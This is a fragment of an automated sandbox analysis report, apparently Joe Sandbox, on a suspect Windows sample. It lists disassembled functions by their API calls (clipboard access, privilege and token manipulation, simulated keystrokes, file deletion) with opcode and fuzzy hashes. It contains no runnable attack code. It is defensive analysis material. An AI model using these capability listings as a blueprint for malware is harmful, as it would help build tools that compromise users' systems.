                            • Opcode Fuzzy Hash: 53d1bf9de73b062b3e01921e97696e8951b6a516c3712ff420c21efc44ca0c18
                            • Instruction Fuzzy Hash: A1216970208605CFDB24DF68C444F6ABBE1BF89304F14496CF99547622C731E885DF52
                            APIs
                            • ___lock_fhandle.LIBCMT ref: 000ABD73
                              • Part of subcall function 000A886A: __getptd_noexit.LIBCMT ref: 000A886A
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __getptd_noexit$___lock_fhandle
                            • String ID:
                            • API String ID: 1144279405-0
                            • Opcode ID: 02b65f9f5f13a2401efc89ec10b0fefe9690420cdc813194326434a1016ce123
                            • Instruction ID: 7561cd45d2a4d2334b108c69d5c2c85ed96461e34ecf7197810cf6281b2e3d65
                            • Opcode Fuzzy Hash: 02b65f9f5f13a2401efc89ec10b0fefe9690420cdc813194326434a1016ce123
                            • Instruction Fuzzy Hash: 391191728056149FD7227FE4CC463AC7BA06F43335F568650E5641F1E3EFB889408B61
                            APIs
                            • __lock_file.LIBCMT ref: 000A377D
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __getptd_noexit__lock_file
                            • String ID:
                            • API String ID: 2597487223-0
                            • Opcode ID: 854c5a7250acba62335c6d4d10d1145dc6f195f863b84f7270f15bf72e22d488
                            • Instruction ID: 27a6fad836a6442c235e1ff21efcc6fc37a6f93cc7a8a2c22262fcab1715c8be
                            • Opcode Fuzzy Hash: 854c5a7250acba62335c6d4d10d1145dc6f195f863b84f7270f15bf72e22d488
                            • Instruction Fuzzy Hash: 55F090B1909215EBDF71AFF48C077DE76A0BF02320F148514F8149A192DB798B50DB91
                            APIs
                            • FreeLibrary.KERNEL32(?,?,?,?,?,000834E2,?,00000001), ref: 00083E6D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID:
                            • API String ID: 3664257935-0
                            • Opcode ID: 9b1cf45faaf3ff06b54f92297a363452c4f6c105b88cd8573dbd173c0d9ab8df
                            • Instruction ID: f46fc2e2c73bd492c3873c4293045afab8175318efdf90c1665bbea88e450acb
                            • Opcode Fuzzy Hash: 9b1cf45faaf3ff06b54f92297a363452c4f6c105b88cd8573dbd173c0d9ab8df
                            • Instruction Fuzzy Hash: 58F03971101741CFCB34AF64D490857BBE0BF54B193248A7EE1D682A61C7719944DF50
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __wfsopen
                            • String ID:
                            • API String ID: 197181222-0
                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                            • Instruction ID: 0d0cc9cd50f0645dfb84305542bd40fe441c0d22c8c641c34493046515394ad5
                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                            • Instruction Fuzzy Hash: E8B0927644030C77CE412E82EC02E893B199B91660F008020FB0C1C162A6B3AAA09A89
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                            • Instruction ID: f8ce5c1855e40bc63746c0ac0448dd087a12ec189ee4c0c339b0603307f9c2f2
                            • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                            • Instruction Fuzzy Hash: 29E09A7498010DAFDB00DFA4D6496ED7BB4EF04302F1006A5FD0596680DA719E548A62
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction ID: 70a2c8ee141c10ee7ab9b31abebfe65e9d2255eaa894416a5ab84375cfdca1fd
                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction Fuzzy Hash: F3E0BF7498010D9FDB00DFB4D6496AD7BB4EF04302F1002A5FD0192280D6719D508A62
                            APIs
                              • Part of subcall function 0009AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0009AF8E
                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 000EF64E
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000EF6AD
                            • GetWindowLongW.USER32(?,000000F0), ref: 000EF6EA
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000EF711
                            • SendMessageW.USER32 ref: 000EF737
                            • _wcsncpy.LIBCMT ref: 000EF7A3
                            • GetKeyState.USER32(00000011), ref: 000EF7C4
                            • GetKeyState.USER32(00000009), ref: 000EF7D1
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000EF7E7
                            • GetKeyState.USER32(00000010), ref: 000EF7F1
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000EF820
                            • SendMessageW.USER32 ref: 000EF843
                            • SendMessageW.USER32(?,00001030,?,000EDE69), ref: 000EF940
                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 000EF956
                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 000EF967
                            • SetCapture.USER32(?), ref: 000EF970
                            • ClientToScreen.USER32(?,?), ref: 000EF9D4
                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 000EF9E0
                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 000EF9FA
                            • ReleaseCapture.USER32 ref: 000EFA05
                            • GetCursorPos.USER32(?), ref: 000EFA3A
                            • ScreenToClient.USER32(?,?), ref: 000EFA47
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 000EFAA9
                            • SendMessageW.USER32 ref: 000EFAD3
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 000EFB12
                            • SendMessageW.USER32 ref: 000EFB3D
                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 000EFB55
                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 000EFB60
                            • GetCursorPos.USER32(?), ref: 000EFB81
                            • ScreenToClient.USER32(?,?), ref: 000EFB8E
                            • GetParent.USER32(?), ref: 000EFBAA
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 000EFC10
                            • SendMessageW.USER32 ref: 000EFC40
                            • ClientToScreen.USER32(?,?), ref: 000EFC96
                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 000EFCC2
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 000EFCEA
                            • SendMessageW.USER32 ref: 000EFD0D
                            • ClientToScreen.USER32(?,?), ref: 000EFD57
                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 000EFD87
                            • GetWindowLongW.USER32(?,000000F0), ref: 000EFE1C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                            • String ID: @GUI_DRAGID$F
                            • API String ID: 2516578528-4164748364
                            • Opcode ID: 53139993f30abed1a6e52f48c61ff011ea93188ab209630a572a9c15ee657cc4
                            • Instruction ID: f72ec201661f5f8fb76ec16c2ff93b1f3603ee7f4a061399c39b4203cc30d998
                            • Opcode Fuzzy Hash: 53139993f30abed1a6e52f48c61ff011ea93188ab209630a572a9c15ee657cc4
                            • Instruction Fuzzy Hash: FB32D074204282AFD760DF65C884EBABBE5FF48358F140629F6A9A72B1D771DC80CB51
                            APIs
                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 000EAFDB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: %d/%02d/%02d
                            • API String ID: 3850602802-328681919
                            • Opcode ID: ac728769c25f1f307f3fcd2882cf11dd292cb470b361c2148cd86aa354b796df
                            • Instruction ID: dfbf876e8d50c4b85841ebf53ee5bd9247ddc9bd3289d182207044ba1bf3b865
                            • Opcode Fuzzy Hash: ac728769c25f1f307f3fcd2882cf11dd292cb470b361c2148cd86aa354b796df
                            • Instruction Fuzzy Hash: 7C12D571600244AFEB258FA6DC49FAE7BF8EF4A310F104129F555EB1E1DBB0A941CB12
                            APIs
                            • GetForegroundWindow.USER32(00000000,00000000), ref: 0009F796
                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000F4388
                            • IsIconic.USER32(000000FF), ref: 000F4391
                            • ShowWindow.USER32(000000FF,00000009), ref: 000F439E
                            • SetForegroundWindow.USER32(000000FF), ref: 000F43A8
                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000F43BE
                            • GetCurrentThreadId.KERNEL32 ref: 000F43C5
                            • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 000F43D1
                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 000F43E2
                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 000F43EA
                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 000F43F2
                            • SetForegroundWindow.USER32(000000FF), ref: 000F43F5
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 000F440A
                            • keybd_event.USER32(00000012,00000000), ref: 000F4415
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 000F441F
                            • keybd_event.USER32(00000012,00000000), ref: 000F4424
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 000F442D
                            • keybd_event.USER32(00000012,00000000), ref: 000F4432
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 000F443C
                            • keybd_event.USER32(00000012,00000000), ref: 000F4441
                            • SetForegroundWindow.USER32(000000FF), ref: 000F4444
                            • AttachThreadInput.USER32(000000FF,?,00000000), ref: 000F446B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                            • String ID: Shell_TrayWnd
                            • API String ID: 4125248594-2988720461
                            • Opcode ID: 5cde471e9b22aa03c715a0a80909c122fbeb3e59ab82455e359d1596f5ffe62f
                            • Instruction ID: ef2a34d7f51c59b717010449a022c6f1515df592ec9b4069e5f796a4253db2bf
                            • Opcode Fuzzy Hash: 5cde471e9b22aa03c715a0a80909c122fbeb3e59ab82455e359d1596f5ffe62f
                            • Instruction Fuzzy Hash: BE317071A4021CBBEB206BB1AC4AF7F7E6CEB44B50F114025FF44AA5D0C6F19940AEA0
                            APIs
                              • Part of subcall function 000BBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000BBF0F
                              • Part of subcall function 000BBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000BBF3C
                              • Part of subcall function 000BBEC3: GetLastError.KERNEL32 ref: 000BBF49
                            • _memset.LIBCMT ref: 000BBA34
                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 000BBA86
                            • CloseHandle.KERNEL32(?), ref: 000BBA97
                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000BBAAE
                            • GetProcessWindowStation.USER32 ref: 000BBAC7
                            • SetProcessWindowStation.USER32(00000000), ref: 000BBAD1
                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 000BBAEB
                              • Part of subcall function 000BB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000BB9EC), ref: 000BB8C5
                              • Part of subcall function 000BB8B0: CloseHandle.KERNEL32(?,?,000BB9EC), ref: 000BB8D7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                            • String ID: $default$winsta0
                            • API String ID: 2063423040-1027155976
                            • Opcode ID: 9e027768e9d77245f28d64a408fec7b963b5e4bd49b4da14c26748df8951ccd0
                            • Instruction ID: fd5bcd5934b78af7adf59d94a8d200028eeb2af9e910962eecb6877aa1d2a1ba
                            • Opcode Fuzzy Hash: 9e027768e9d77245f28d64a408fec7b963b5e4bd49b4da14c26748df8951ccd0
                            • Instruction Fuzzy Hash: 728168B1800209AFDF11DFE4DD89AEEBBB8FF08304F144529F955A6161DBB18E55EB20
                            APIs
                              • Part of subcall function 000831B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 000831DA
                              • Part of subcall function 000C7B9F: __wsplitpath.LIBCMT ref: 000C7BBC
                              • Part of subcall function 000C7B9F: __wsplitpath.LIBCMT ref: 000C7BCF
                              • Part of subcall function 000C7C0C: GetFileAttributesW.KERNEL32(?,000C6A7B), ref: 000C7C0D
                            • _wcscat.LIBCMT ref: 000C6B9D
                            • _wcscat.LIBCMT ref: 000C6BBB
                            • __wsplitpath.LIBCMT ref: 000C6BE2
                            • FindFirstFileW.KERNEL32(?,?), ref: 000C6BF8
                            • _wcscpy.LIBCMT ref: 000C6C57
                            • _wcscat.LIBCMT ref: 000C6C6A
                            • _wcscat.LIBCMT ref: 000C6C7D
                            • lstrcmpiW.KERNEL32(?,?), ref: 000C6CAB
                            • DeleteFileW.KERNEL32(?), ref: 000C6CBC
                            • MoveFileW.KERNEL32(?,?), ref: 000C6CDB
                            • MoveFileW.KERNEL32(?,?), ref: 000C6CEA
                            • CopyFileW.KERNEL32(?,?,00000000), ref: 000C6CFF
                            • DeleteFileW.KERNEL32(?), ref: 000C6D10
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 000C6D37
                            • FindClose.KERNEL32(00000000), ref: 000C6D53
                            • FindClose.KERNEL32(00000000), ref: 000C6D61
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                            • String ID: \*.*
                            • API String ID: 1867810238-1173974218
                            • Opcode ID: 14ce94a20e9ac8690972bd6f0cca55323b2ec6fce6a9a9ec9c5d85a71a25a42d
                            • Instruction ID: 4e796e2b6956f4bc8ef3b3868e231d4283e14a929b201aa6636ce7a1bb522854
                            • Opcode Fuzzy Hash: 14ce94a20e9ac8690972bd6f0cca55323b2ec6fce6a9a9ec9c5d85a71a25a42d
                            • Instruction Fuzzy Hash: 2C51107290415CAADB21EBE0DC84FEE77BCAF05300F4445DAE54AA3042DB719B89CF61
                            APIs
                            • OpenClipboard.USER32(0011DBF0), ref: 000D70C3
                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 000D70D1
                            • GetClipboardData.USER32(0000000D), ref: 000D70D9
                            • CloseClipboard.USER32 ref: 000D70E5
                            • GlobalLock.KERNEL32(00000000), ref: 000D7101
                            • CloseClipboard.USER32 ref: 000D710B
                            • GlobalUnlock.KERNEL32(00000000), ref: 000D7120
                            • IsClipboardFormatAvailable.USER32(00000001), ref: 000D712D
                            • GetClipboardData.USER32(00000001), ref: 000D7135
                            • GlobalLock.KERNEL32(00000000), ref: 000D7142
                            • GlobalUnlock.KERNEL32(00000000), ref: 000D7176
                            • CloseClipboard.USER32 ref: 000D7283
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                            • String ID:
                            • API String ID: 3222323430-0
                            • Opcode ID: 81684cb320cbd683bd2cb8e8e88582e7fafbe5f0ef3914cd3a3150bc2336642e
                            • Instruction ID: e33548aba31df4ead8a235db579e6a5f693273fb982c82df6873f5c8938a04a6
                            • Opcode Fuzzy Hash: 81684cb320cbd683bd2cb8e8e88582e7fafbe5f0ef3914cd3a3150bc2336642e
                            • Instruction Fuzzy Hash: 3151A635208305AFD310FBA4DC46FBE77A8BB44B11F00052AF58AD62D2EBB1D9458B72
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 000D2065
                            • _wcscmp.LIBCMT ref: 000D207A
                            • _wcscmp.LIBCMT ref: 000D2091
                            • GetFileAttributesW.KERNEL32(?), ref: 000D20A3
                            • SetFileAttributesW.KERNEL32(?,?), ref: 000D20BD
                            • FindNextFileW.KERNEL32(00000000,?), ref: 000D20D5
                            • FindClose.KERNEL32(00000000), ref: 000D20E0
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 000D20FC
                            • _wcscmp.LIBCMT ref: 000D2123
                            • _wcscmp.LIBCMT ref: 000D213A
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000D214C
                            • SetCurrentDirectoryW.KERNEL32(00133A68), ref: 000D216A
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 000D2174
                            • FindClose.KERNEL32(00000000), ref: 000D2181
                            • FindClose.KERNEL32(00000000), ref: 000D2191
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                            • String ID: *.*
                            • API String ID: 1803514871-438819550
                            • Opcode ID: 5cac4c50c14366d9bc391442fa6acffa645624ed900633f165673809bcd1e8c8
                            • Instruction ID: f858858299c5a7c015edbbe337c7173cfe714a2e79b68c5b219da6cb0ec5eb26
                            • Opcode Fuzzy Hash: 5cac4c50c14366d9bc391442fa6acffa645624ed900633f165673809bcd1e8c8
                            • Instruction Fuzzy Hash: 6131A0355003197ACB24EBE4EC48ADE77ECAF65361F104166E950E3291DBB0DE84CB74
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 000D21C0
                            • _wcscmp.LIBCMT ref: 000D21D5
                            • _wcscmp.LIBCMT ref: 000D21EC
                              • Part of subcall function 000C7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 000C7621
                            • FindNextFileW.KERNEL32(00000000,?), ref: 000D221B
                            • FindClose.KERNEL32(00000000), ref: 000D2226
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 000D2242
                            • _wcscmp.LIBCMT ref: 000D2269
                            • _wcscmp.LIBCMT ref: 000D2280
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000D2292
                            • SetCurrentDirectoryW.KERNEL32(00133A68), ref: 000D22B0
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 000D22BA
                            • FindClose.KERNEL32(00000000), ref: 000D22C7
                            • FindClose.KERNEL32(00000000), ref: 000D22D7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                            • String ID: *.*
                            • API String ID: 1824444939-438819550
                            • Opcode ID: 6650b9dbf9f22b24e3727e0563d6e063f117e6bc3223489b5613d5cd0a98ed3d
                            • Instruction ID: 8661ffe6d02db3251219d9f5ab4a6d0a697d2de7a2c7721f61fe4c4e7a6f7c07
                            • Opcode Fuzzy Hash: 6650b9dbf9f22b24e3727e0563d6e063f117e6bc3223489b5613d5cd0a98ed3d
                            • Instruction Fuzzy Hash: EA31A1319053197ACB24EBA4EC48EEE77ACAF65320F1041A6F850A3291DB709F85DB74
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove_memset
                            • String ID: Q\E$[$\$\$\$]$^
                            • API String ID: 3555123492-286096704
                            • Opcode ID: 20fd6b4a1c4a510f6ab918bbe19e8baf5d678d8dd1d072fc7675b2fddc0e6f63
                            • Instruction ID: f384c4627b2d43bb2494f8b49e55341cfb8875547d04dde9a736fd27d399f891
                            • Opcode Fuzzy Hash: 20fd6b4a1c4a510f6ab918bbe19e8baf5d678d8dd1d072fc7675b2fddc0e6f63
